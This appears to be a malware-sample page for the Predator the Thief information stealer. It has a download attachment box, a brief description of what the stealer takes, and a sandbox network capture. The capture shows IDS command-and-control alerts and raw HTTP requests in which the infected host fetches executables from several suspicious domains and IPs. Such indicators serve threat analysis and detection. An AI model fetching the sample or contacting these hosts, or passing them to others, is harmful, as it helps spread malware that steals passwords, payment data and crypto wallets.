Download Attachments
1
1
Date added: May 30, 2020 9:50 pm
Added by: admin
File size: 8 MB
Downloads: 3765
Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallets.
TypeStealer Originex-USSR First seen1 July, 2018 Last seen29 May, 2020
Connections
PID Process IP ASN CN Reputation 2492 uplads.exe 185.136.169.150:80 DE malicious 2576 MSIE711.tmp 88.99.66.31:443 Hetzner Online GmbH DE malicious 932 dllhost.exe 217.8.117.63:80 –– malicious
DNS requests
Domain IP Reputation iplogger.org 88.99.66.31 shared
Threats
PID Process Class Message 2492 uplads.exe A Network Trojan was detected STEALER [PTsecurity] Win32/Spy.Agent.PLQ (Predator Stealer) CnC Checkin 932 dllhost.exe A Network Trojan was detected STEALER [PTsecurity] Win32/Spy.Agent.PLQ (Predator Stealer) CnC Checkin
2020-05-30 09:10:05.558831 IP 10.1.10.15.49762 > 217.8.117.63.80: Flags [P.], seq 1:495, ack 1, win 16425, length 494: HTTP: GET /1.exe HTTP/1.1
E…FI@…PA
.
…u?.b.P..ss..HsP.@)….GET /1.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=202682-
Unless-Modified-Since: Sat, 30 May 2020 02:28:46 GMT
If-Range: “5ed1c4de-de000”
Host: tldrbox.top
Connection: Keep-Alive
2020-05-30 09:11:24.486820 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
E…K3@…F.
.
.@F…m.P.m.l….P..\….GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:24.581340 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [.], ack 198, win 13936, length 0
E..(=.@.3…@F..
.
..P.m…..m.1P.6p.&……..
2020-05-30 09:11:24.582243 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [F.], seq 1, ack 198, win 13936, length 0
E..(=.@.3…@F..
.
..P.m…..m.1P.6p.%……..
2020-05-30 09:11:24.582431 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [.], ack 2, win 64860, length 0
E..(K6@…Gy
.
.@F…m.P.m.1….P..\$9……..
2020-05-30 09:11:24.582560 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [F.], seq 198, ack 2, win 64860, length 0
E..(K7@…Gx
.
.@F…m.P.m.1….P..\$8……..
2020-05-30 09:11:24.674548 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [.], ack 199, win 13936, length 0
E..(..@.3…@F..
.
..P.m…..m.2P.6p.$……..
2020-05-30 09:11:24.686266 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [S], seq 764056628, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4K8@…Gk
.
.@F…o.P-..4…… .bw…………..
2020-05-30 09:11:24.686520 STP 802.1w, Rapid STP, Flags [Learn, Forward, Agreement], bridge-id 8000.00:9a:d2:51:a3:82.803f, length 43
….|…..Q………..Q…?…………….
2020-05-30 09:11:24.774426 IP 64.70.19.203.80 > 10.1.10.15.49775: Flags [S.], seq 2516359664, ack 764056629, win 14600, options [mss 1380], length 0
E..,..@.3…@F..
.
..P.o….-..5`.9.B……d..
2020-05-30 09:11:24.774676 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [.], ack 1, win 64860, length 0
E..(K9@…Gv
.
.@F…o.P-..5….P..\……….
2020-05-30 09:11:24.774840 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /2 HTTP/1.1
E…K:@…F.
.
.@F…o.P-..5….P..\….GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:24.774840 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /2 HTTP/1.1
E…K:@…F.
.
.@F…o.P-..5….P..\….GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:25.054712 IP 10.1.10.15.49776 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /3 HTTP/1.1
E…KA@…F.
.
.@F…p.P.+.t…LP..\.~..GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:25.338839 IP 10.1.10.15.49777 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /4 HTTP/1.1
E…KH@…F.
.
.@F…q.PUI.p.$6.P..\….GET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:25.634919 IP 10.1.10.15.49778 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /5 HTTP/1.1
E…KN@…F.
.
.@F…r.P…q….P..\….GET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:25.915797 IP 10.1.10.15.49779 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /6 HTTP/1.1
E…KT@…F.
.
.@F…s.P..C.C…P..\.a..GET /6 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:26.210240 IP 10.1.10.15.49780 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /7 HTTP/1.1
E…KZ@…F.
.
.@F…t.P,)…..wP..\.l..GET /7 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:26.490418 IP 10.1.10.15.49781 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 16560, length 197: HTTP: GET /8 HTTP/1.1
E…K`@…F.
.
.@F…u.P..IC….P.@..{..GET /8 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:26.948325 IP 10.1.10.15.49782 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
E…Kf@…F.
.
.@F…v.P….3..oP..\….GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toirgsiorgididii.ws
2020-05-30 09:11:29.467097 IP 10.1.10.15.49790 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 16560, length 197: HTTP: GET /1 HTTP/1.1
E…K.@…F[
.
.@F…~.P…..{..P.@.B…GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tefiefijiejdijef.ws
2020-05-30 09:11:31.927173 IP 10.1.10.15.49798 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
E…K.@…F3
.
.@F…..P)…B…P..\….GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tinbeafbiaebfiie.ws
2020-05-30 09:11:36.856234 IP 10.1.10.15.49814 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
E…L @…E.
.
.@F…..PF..NZ…P..\.R..GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tpleflpokadkeoot.ws
2020-05-30 09:12:14.943782 IP 10.1.10.15.50028 > 64.70.19.203.80: Flags [P.], seq 1:201, ack 1, win 64860, length 200: HTTP: GET /pe/7 HTTP/1.1
E…PN@…A.
.
.@F…l.P.wr./…P..\….GET /pe/7 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tgauheudbbchaiii.ws
Please follow and like us: